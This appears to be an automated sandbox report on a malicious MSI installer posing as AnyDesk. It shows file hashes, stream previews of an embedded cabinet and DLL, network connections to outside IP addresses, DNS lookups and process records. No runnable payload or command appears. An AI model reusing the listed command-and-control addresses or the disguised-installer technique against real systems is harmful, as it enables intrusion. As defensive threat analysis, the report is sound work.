| SHA-512: | 7113888A8439AE5AF1B260C40229F7EBB98BDECE52EBAB0CE97137933AF4E9777D92D68166DBCF87A95CF88615452CAE7ECDF555B4785FFFE63C5783DBCB595D |
| Malicious: | true |
| Preview: |
| File type: | |
| Entropy (8bit): | 7.978539254164263 |
| TrID: |
|
| File name: | 1.msi |
| File size: | 4063232 |
| MD5: | 6cf5ad7a7d1b7bab0c62e246cf41a985 |
| SHA1: | b06a03adc550ead96534f5e723395c4e16bfdf44 |
| SHA256: | fb9f0bf2b71bf576053c56cb913ea4e93581fc9d3aa9d6d8a0ae572a1622f050 |
| SHA512: | 46cd8bd1ead75a8adb7d5bff81a2fdc04567d462e965664f6f9f796237839f07f74d2201c3da8f7f37c9dfc45749ed88708db5a216d84f7ac146e5af58a8608e |
| SSDEEP: | 98304:pp+vXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHw:+zkTciIYUNuNCAuPH |
| TLSH: | 411633603AD8C537D2DA0636092E8BAA3A657D755F21C0DB2B587CBC5E317D3AC39342 |
| File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
 | |
| Icon Hash: | a2a0b496b2caca72 |
| Document Type: | OLE |
| Number of OLE Files: | 1 |
| Has Summary Info: | |
| Application Name: | MSI Wrapper (10.0.50.0) |
| Encrypted Document: | False |
| Contains Word Document Stream: | False |
| Contains Workbook/Book Stream: | False |
| Contains PowerPoint Document Stream: | False |
| Contains Visio Document Stream: | False |
| Contains ObjectPool Stream: | False |
| Flash Objects Count: | 0 |
| Contains VBA Macros: | False |
| Code Page: | 1252 |
| Title: | |
| Subject: | |
| Author: | |
| Keywords: | |
| Template: | |
| Revion Number: | {8CB27BF3-59BC-4419-BE15-E9E385453F27} |
| Create Time: | 2021-02-18 21:32:30 |
| Last Saved Time: | 2021-02-18 21:32:30 |
| Number of Pages: | 200 |
| Number of Words: | 2 |
| Creating Application: | |
| Security: | 2 |
| Document Code Page: | 1251 |
| Company: |
General | |
| Stream Path: | \x5DocumentSummaryInformation |
| File Type: | data |
| Stream Size: | 120 |
| Entropy: | 2.826912441242884 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . H . . . . . . . . . . . ( . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A n y d e s k . |
| Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 48 00 00 00 03 00 00 00 01 00 00 00 28 00 00 00 00 00 00 80 30 00 00 00 0f 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e3 04 00 00 13 00 00 00 19 04 00 00 1e 00 00 00 08 00 00 00 41 6e 79 64 65 73 6b 00 |
General | |
| Stream Path: | \x5SummaryInformation |
| File Type: | data |
| Stream Size: | 528 |
| Entropy: | 4.752216684650982 |
| Base64 Encoded: | True |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I n s t a l l e r . . . . . . . . . . . I n t e l ; 1 0 3 3 . . . . . . ' . . . { 8 C B 2 7 B F 3 - 5 9 B C - 4 4 1 9 - B E 1 5 - E 9 E 3 8 5 4 5 3 F 2 7 } . . @ . . . . k p = . . @ . . |
| Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e0 01 00 00 0d 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 18 01 00 00 03 00 00 00 70 01 00 00 04 00 00 00 08 01 00 00 05 00 00 00 80 00 00 00 07 00 00 00 94 00 00 00 09 00 00 00 a8 00 00 00 0c 00 00 00 d8 00 00 00 0d 00 00 00 e4 00 00 00 |
General | |
| Stream Path: | \x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480 |
| File Type: | Microsoft Cabinet archive data, 3811024 bytes, 1 file |
| Stream Size: | 3811024 |
| Entropy: | 7.999935868582085 |
| Base64 Encoded: | True |
| Data ASCII: | M S C F . . . . & : . . . . . , . . . . . . . . . . . . . . . ~ . . H . . . v . . . . : . . . . . . . T p . i n s t a l l . e x e . . W . [ . . H . . " T # . . m . U e p . n I : . . . h < d . r ) R * + . - [ y / c 1 . x w > . " T I 1 [ ( . . . . 5 . H . . . F j . . . } } K . . O . % . o " . P j / M 2 I o t . . B / Z B k . . . . 8 . , j A r I ` r r I # ) R . . 5 ? I h . . . . . . . C L S f P $ . $ H D 4 . i q 6 . 4 . . k q . . . . . # . * . ! X . . + . C . . - p - . ' . . O d l Y E . ! . A ' . q Y % l . . |
| Data Raw: | 4d 53 43 46 00 00 00 00 d0 26 3a 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 7e ea 00 00 48 00 00 00 76 00 03 12 00 8e 3a 00 00 00 00 00 00 00 c6 54 d7 70 20 00 69 6e 73 74 61 6c 6c 2e 65 78 65 00 b8 ea a5 05 d4 57 00 80 5b 80 80 8d 04 10 48 a9 07 00 22 54 80 23 00 00 6d 00 fe b7 55 ab 65 97 99 70 b9 1b 6e c9 49 3a 09 12 9d 11 68 3c 64 19 72 29 52 cb 2a 2b 1a 2d |
General | |
| Stream Path: | \x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479 |
| File Type: | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows |
| Stream Size: | 212992 |
| Entropy: | 6.513444216841171 |
| Base64 Encoded: | True |
| Data ASCII: | M Z . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . L ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . p p p p . p / p . . p q % p p . p . p R i c h p . . . . . . . . . . . . . . . . . . . . . . . . P E . . L . . . . ` . . . . . . . . . . ! . . . . . h . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . |
| Data Raw: | 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 |
General | |
| Stream Path: | \x18496\x15167\x17394\x17464\x17841 |
| File Type: | data |
| Stream Size: | 672 |
| Entropy: | 4.764474142026 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . / . / . / . / . / . / . 5 . 5 . 5 . = . = . = . = . = . M . M . M . M . M . M . M . M . \\ . \\ . a . a . a . a . a . a . a . a . o . o . r . r . r . s . s . s . t . t . w . w . w . w . w . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 35 00 35 00 35 00 3d 00 3d 00 3d 00 3d 00 3d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 5c 00 5c 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 6f 00 6f 00 72 00 72 00 72 00 73 00 73 00 73 00 74 00 74 00 77 00 |
General | |
| Stream Path: | \x18496\x16191\x17783\x17516\x15210\x17892\x18468 |
| File Type: | ASCII text, with very long lines, with no line terminators |
| Stream Size: | 8546 |
| Entropy: | 5.082724064913251 |
| Base64 Encoded: | True |
| Data ASCII: | N a m e T a b l e T y p e C o l u m n _ V a l i d a t i o n V a l u e N P r o p e r t y I d _ S u m m a r y I n f o r m a t i o n D e s c r i p t i o n S e t C a t e g o r y K e y C o l u m n M a x V a l u e N u l l a b l e K e y T a b l e M i n V a l u e I d e n t i f i e r N a m e o f t a b l e N a m e o f c o l u m n Y ; N W h e t h e r t h e c o l u m n i s n u l l a b l e Y M i n i m u m v a l u e a l l o w e d M a x i m u m v a l u e a l l o w e d F o r f o r e i g n k e y |
| Data Raw: | 4e 61 6d 65 54 61 62 6c 65 54 79 70 65 43 6f 6c 75 6d 6e 5f 56 61 6c 69 64 61 74 69 6f 6e 56 61 6c 75 65 4e 50 72 6f 70 65 72 74 79 49 64 5f 53 75 6d 6d 61 72 79 49 6e 66 6f 72 6d 61 74 69 6f 6e 44 65 73 63 72 69 70 74 69 6f 6e 53 65 74 43 61 74 65 67 6f 72 79 4b 65 79 43 6f 6c 75 6d 6e 4d 61 78 56 61 6c 75 65 4e 75 6c 6c 61 62 6c 65 4b 65 79 54 61 62 6c 65 4d 69 6e 56 61 6c 75 65 |
General | |
| Stream Path: | \x18496\x16191\x17783\x17516\x15978\x17586\x18479 |
| File Type: | data |
| Stream Size: | 1216 |
| Entropy: | 3.1068972075441508 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . . . 6 . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . o . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . ; . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . S . . . ^ . . . . . . . . |
| Data Raw: | 00 00 00 00 04 00 06 00 05 00 02 00 00 00 00 00 04 00 02 00 06 00 02 00 0b 00 15 00 05 00 05 00 01 00 2c 00 0a 00 01 00 13 00 02 00 0b 00 06 00 03 00 02 00 08 00 02 00 09 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 0a 00 19 00 0d 00 01 00 0e 00 01 00 03 00 01 00 1e 00 01 00 01 00 2a 00 15 00 01 00 15 00 01 00 36 00 01 00 24 00 01 00 f5 00 01 00 0f 00 01 00 04 00 09 00 |
General | |
| Stream Path: | \x18496\x16255\x16740\x16943\x18486 |
| File Type: | data |
| Stream Size: | 38 |
| Entropy: | 3.123963756721792 |
| Base64 Encoded: | False |
| Data ASCII: | . . " . ) . * . + . / . 5 . = . M . \\ . a . o . r . s . t . w . . . . |
| Data Raw: | 06 00 22 00 29 00 2a 00 2b 00 2f 00 35 00 3d 00 4d 00 5c 00 61 00 6f 00 72 00 73 00 74 00 77 00 82 00 86 00 90 00 |
General | |
| Stream Path: | \x18496\x16383\x17380\x16876\x17892\x17580\x18481 |
| File Type: | data |
| Stream Size: | 2064 |
| Entropy: | 2.381269221109181 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . / . / . / . / . / . / . 5 . 5 . 5 . = . = . = . = . = . M . M . M . M . M . M . M . M . \\ . \\ . a . a . a . a . a . a . a . a . o . o . r . r . r . s . s . s . t . t . w . w . w . w . w . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . % . ' . # . % . ' . # . % . ' . . . - . % . / . 1 . 4 . 7 . : . 5 . I . K . . . # . @ . C . F . . . 4 . 7 . M . O . Q . T . V . ] . _ . ' . 7 . _ |
| Data Raw: | 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 0a 00 0a 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 35 00 35 00 35 00 3d 00 3d 00 3d 00 3d 00 3d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 5c 00 5c 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 6f 00 6f 00 72 00 72 00 72 00 73 00 73 00 73 00 74 00 |
General | |
| Stream Path: | \x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481 |
| File Type: | data |
| Stream Size: | 4 |
| Entropy: | 1.5 |
| Base64 Encoded: | False |
| Data ASCII: | . . |
| Data Raw: | e1 00 e2 00 |
General | |
| Stream Path: | \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934 |
| File Type: | data |
| Stream Size: | 48 |
| Entropy: | 3.0684210940655055 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . x . < . |
| Data Raw: | 9d 00 9e 00 9f 00 a0 00 a1 00 a2 00 a3 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 78 85 dc 85 3c 8f a0 8f c8 99 |
General | |
| Stream Path: | \x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472 |
| File Type: | data |
| Stream Size: | 24 |
| Entropy: | 2.594360937770434 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . |
| Data Raw: | 9d 00 9e 00 9f 00 a5 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 14 85 |
General | |
| Stream Path: | \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472 |
| File Type: | data |
| Stream Size: | 42 |
| Entropy: | 2.9135675273020816 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . x . . . |
| Data Raw: | 9d 00 9f 00 a0 00 a1 00 a4 00 a6 00 a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 e8 83 78 85 dc 85 c8 99 9c 98 00 99 |
General | |
| Stream Path: | \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486 |
| File Type: | data |
| Stream Size: | 4 |
| Entropy: | 1.5 |
| Base64 Encoded: | False |
| Data ASCII: | . . |
| Data Raw: | cc 00 aa 00 |
General | |
| Stream Path: | \x18496\x16911\x17892\x17784\x18472 |
| File Type: | 386 compact demand paged pure executable |
| Stream Size: | 16 |
| Entropy: | 1.9197367178034825 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . |
| Data Raw: | cc 00 00 00 cd 00 00 00 02 80 01 80 00 00 00 80 |
General | |
| Stream Path: | \x18496\x16918\x17191\x18468 |
| File Type: | MIPSEB Ucode |
| Stream Size: | 14 |
| Entropy: | 0.946372935985442 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . |
| Data Raw: | 01 80 00 00 00 80 00 00 00 00 00 00 00 00 |
General | |
| Stream Path: | \x18496\x16923\x17194\x17910\x18229 |
| File Type: | data |
| Stream Size: | 60 |
| Entropy: | 3.5292412679834797 |
| Base64 Encoded: | False |
| Data ASCII: | . . . " . % . ( . . . . . . . . . . . . . . . . . . . # . & . ) . . . ! . $ . ' . * . . . . . . |
| Data Raw: | ad 00 1f 01 22 01 25 01 28 01 ff 7f ff 7f ff 7f ff 7f ff 7f 1c 01 1c 01 1c 01 1c 01 1c 01 1d 01 20 01 23 01 26 01 29 01 1e 01 21 01 24 01 27 01 2a 01 aa 00 aa 00 aa 00 aa 00 aa 00 |
General | |
| Stream Path: | \x18496\x17163\x16689\x18229 |
| File Type: | data |
| Stream Size: | 8 |
| Entropy: | 1.75 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . |
| Data Raw: | a8 00 a9 00 01 00 01 00 |
General | |
| Stream Path: | \x18496\x17165\x16949\x17894\x17778\x18492 |
| File Type: | data |
| Stream Size: | 18 |
| Entropy: | 2.102187170949333 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . |
| Data Raw: | ac 00 c7 00 c9 00 c7 00 c9 00 00 00 c8 00 ca 00 cb 00 |
General | |
| Stream Path: | \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934 |
| File Type: | data |
| Stream Size: | 216 |
| Entropy: | 4.294855551942891 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . d @ . ( p . ! y . |
| Data Raw: | 9d 00 9e 00 9f 00 a0 00 a1 00 a3 00 a4 00 a6 00 a7 00 ae 00 b0 00 b1 00 b4 00 b6 00 b7 00 b9 00 ba 00 bb 00 bd 00 bf 00 c0 00 c2 00 c3 00 cf 00 d0 00 d1 00 d2 00 d3 00 d4 00 d5 00 d6 00 d7 00 d8 00 d9 00 db 00 df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 00 dc 00 dc 00 de 00 de 00 de 00 de 00 de 00 da 00 dd 00 dd 00 dd 00 dd 00 dd 00 00 00 00 00 00 00 00 00 00 00 |
General | |
| Stream Path: | \x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472 |
| File Type: | data |
| Stream Size: | 48 |
| Entropy: | 3.110087760732172 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . d |
| Data Raw: | 9d 00 9e 00 9f 00 a5 00 cf 00 d0 00 d1 00 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 14 85 19 80 64 80 bc 82 b0 84 |
General | |
| Stream Path: | \x18496\x17548\x17648\x17522\x17512\x18487 |
| File Type: | Dyalog APL aplcore version 171.0 |
| Stream Size: | 12 |
| Entropy: | 2.292481250360578 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . |
| Data Raw: | aa 00 ab 00 ac 00 04 80 00 00 ad 00 |
General | |
| Stream Path: | \x18496\x17630\x17770\x16868\x18472 |
| File Type: | data |
| Stream Size: | 32 |
| Entropy: | 2.198391110799899 |
| Base64 Encoded: | False |
| Data ASCII: | / . / . . . - . - . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | 2f 01 2f 01 00 00 2d 01 2d 01 00 00 00 00 00 00 01 00 00 80 02 00 00 80 00 00 00 00 19 01 18 01 |
General | |
| Stream Path: | \x18496\x17753\x17650\x17768\x18231 |
| File Type: | data |
| Stream Size: | 88 |
| Entropy: | 3.9470457308545095 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . / . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . |
| Data Raw: | 91 00 e3 00 e5 00 e6 00 f0 00 f1 00 f3 00 f5 00 f7 00 f9 00 fb 00 fd 00 ff 00 01 01 03 01 10 01 11 01 13 01 15 01 17 01 1a 01 2c 01 2f 01 e4 00 e4 00 e4 00 ee 00 02 01 f4 00 f6 00 f8 00 fa 00 fc 00 fe 00 00 01 02 01 02 01 2e 01 12 01 14 01 16 01 2d 01 1b 01 e4 00 |
General | |
| Stream Path: | \x18496\x17932\x17910\x17458\x16778\x17207\x17522 |
| File Type: | data |
| Stream Size: | 180 |
| Entropy: | 2.754589929626484 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . 3 . . 3 . 3 . . . 3 . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
| Data Raw: | ae 00 b0 00 b1 00 b4 00 b6 00 b7 00 b9 00 ba 00 bb 00 bd 00 bf 00 c0 00 c2 00 c3 00 c5 00 01 80 33 80 01 80 01 80 33 80 01 8c 33 80 01 8c 01 80 01 80 33 80 01 8c 33 80 01 8c 01 80 a9 00 b1 00 a9 00 a9 00 b7 00 a9 00 ba 00 a9 00 a9 00 a9 00 c0 00 a9 00 c3 00 a9 00 a9 00 af 00 b2 00 b3 00 b5 00 b2 00 b8 00 b2 00 b3 00 bc 00 be 00 b2 00 c1 00 b2 00 c4 00 c6 00 00 00 00 00 00 00 00 00 |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Aug 5, 2022 18:23:17.955034971 CEST | 49175 | 443 | 192.168.2.22 | 195.181.174.167 |
| Aug 5, 2022 18:23:17.955077887 CEST | 443 | 49175 | 195.181.174.167 | 192.168.2.22 |
| Aug 5, 2022 18:23:17.955163002 CEST | 49175 | 443 | 192.168.2.22 | 195.181.174.167 |
| Aug 5, 2022 18:23:17.956656933 CEST | 49175 | 443 | 192.168.2.22 | 195.181.174.167 |
| Aug 5, 2022 18:23:17.956707001 CEST | 443 | 49175 | 195.181.174.167 | 192.168.2.22 |
| Aug 5, 2022 18:23:17.956804037 CEST | 49175 | 443 | 192.168.2.22 | 195.181.174.167 |
| Aug 5, 2022 18:23:18.078598976 CEST | 49176 | 80 | 192.168.2.22 | 92.223.88.41 |
| Aug 5, 2022 18:23:18.109005928 CEST | 80 | 49176 | 92.223.88.41 | 192.168.2.22 |
| Aug 5, 2022 18:23:18.109520912 CEST | 49176 | 80 | 192.168.2.22 | 92.223.88.41 |
| Aug 5, 2022 18:23:18.117553949 CEST | 49177 | 6568 | 192.168.2.22 | 195.181.174.174 |
| Aug 5, 2022 18:23:18.136924982 CEST | 6568 | 49177 | 195.181.174.174 | 192.168.2.22 |
| Aug 5, 2022 18:23:18.137054920 CEST | 49177 | 6568 | 192.168.2.22 | 195.181.174.174 |
| Aug 5, 2022 18:23:18.137501955 CEST | 49177 | 6568 | 192.168.2.22 | 195.181.174.174 |
| Aug 5, 2022 18:23:18.158116102 CEST | 6568 | 49177 | 195.181.174.174 | 192.168.2.22 |
| Aug 5, 2022 18:23:18.158333063 CEST | 49177 | 6568 | 192.168.2.22 | 195.181.174.174 |
| Aug 5, 2022 18:23:45.921768904 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
| Aug 5, 2022 18:23:46.016635895 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
| Aug 5, 2022 18:23:46.019696951 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
| Aug 5, 2022 18:23:46.019758940 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
| Aug 5, 2022 18:23:46.153834105 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
| Aug 5, 2022 18:23:46.159286976 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
| Aug 5, 2022 18:23:46.294455051 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
| Aug 5, 2022 18:23:46.294933081 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
| Aug 5, 2022 18:23:46.295002937 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
| Aug 5, 2022 18:23:46.299264908 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
| Aug 5, 2022 18:23:47.520963907 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
| Aug 5, 2022 18:23:47.615866899 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Aug 5, 2022 18:23:17.905138016 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
| Aug 5, 2022 18:23:17.924896002 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
| Aug 5, 2022 18:23:17.925493956 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
| Aug 5, 2022 18:23:17.944211960 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
| Aug 5, 2022 18:23:18.053093910 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
| Aug 5, 2022 18:23:18.075155973 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
| Aug 5, 2022 18:23:18.088778019 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
| Aug 5, 2022 18:23:18.109394073 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Aug 5, 2022 18:23:17.905138016 CEST | 192.168.2.22 | 8.8.8.8 | 0x8710 | Standard query (0) | A (IP address) | IN (0x0001) | |
| Aug 5, 2022 18:23:17.925493956 CEST | 192.168.2.22 | 8.8.8.8 | 0x8710 | Standard query (0) | A (IP address) | IN (0x0001) | |
| Aug 5, 2022 18:23:18.053093910 CEST | 192.168.2.22 | 8.8.8.8 | 0xcfca | Standard query (0) | A (IP address) | IN (0x0001) | |
| Aug 5, 2022 18:23:18.088778019 CEST | 192.168.2.22 | 8.8.8.8 | 0x5d9d | Standard query (0) | A (IP address) | IN (0x0001) |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Aug 5, 2022 18:23:17.924896002 CEST | 8.8.8.8 | 192.168.2.22 | 0x8710 | No error (0) | 92.223.88.41 | A (IP address) | IN (0x0001) | ||
| Aug 5, 2022 18:23:17.944211960 CEST | 8.8.8.8 | 192.168.2.22 | 0x8710 | No error (0) | 195.181.174.167 | A (IP address) | IN (0x0001) | ||
| Aug 5, 2022 18:23:18.075155973 CEST | 8.8.8.8 | 192.168.2.22 | 0xcfca | No error (0) | 92.223.88.41 | A (IP address) | IN (0x0001) | ||
| Aug 5, 2022 18:23:18.109394073 CEST | 8.8.8.8 | 192.168.2.22 | 0x5d9d | No error (0) | 195.181.174.174 | A (IP address) | IN (0x0001) |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
| Target ID: | 1 |
| Start time: | 18:22:14 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\System32\msiexec.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0xff1c0000 |
| File size: | 128512 bytes |
| MD5 hash: | AC2E7152124CEED36846BD1B6592A00F |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Target ID: | 2 |
| Start time: | 18:22:15 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\System32\msiexec.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0xff1c0000 |
| File size: | 128512 bytes |
| MD5 hash: | AC2E7152124CEED36846BD1B6592A00F |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Target ID: | 3 |
| Start time: | 18:22:16 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\System32\VSSVC.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0xff910000 |
| File size: | 1600512 bytes |
| MD5 hash: | B60BA0BC31B0CB414593E169F6F21CC2 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Target ID: | 4 |
| Start time: | 18:22:16 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\System32\svchost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0xff7d0000 |
| File size: | 27136 bytes |
| MD5 hash: | C78655BC80301D76ED4FEF1C1EA40A7D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Target ID: | 5 |
| Start time: | 18:22:57 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\SysWOW64\msiexec.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xd00000 |
| File size: | 73216 bytes |
| MD5 hash: | 4315D6ECAE85024A0567DF2CB253B7B0 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Target ID: | 6 |
| Start time: | 18:23:03 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\SysWOW64\msiexec.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xd00000 |
| File size: | 73216 bytes |
| MD5 hash: | 4315D6ECAE85024A0567DF2CB253B7B0 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Target ID: | 7 |
| Start time: | 18:23:04 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\SysWOW64\icacls.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x5b0000 |
| File size: | 27136 bytes |
| MD5 hash: | 1542A92D5C6F7E1E80613F3466C9CE7F |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Target ID: | 9 |
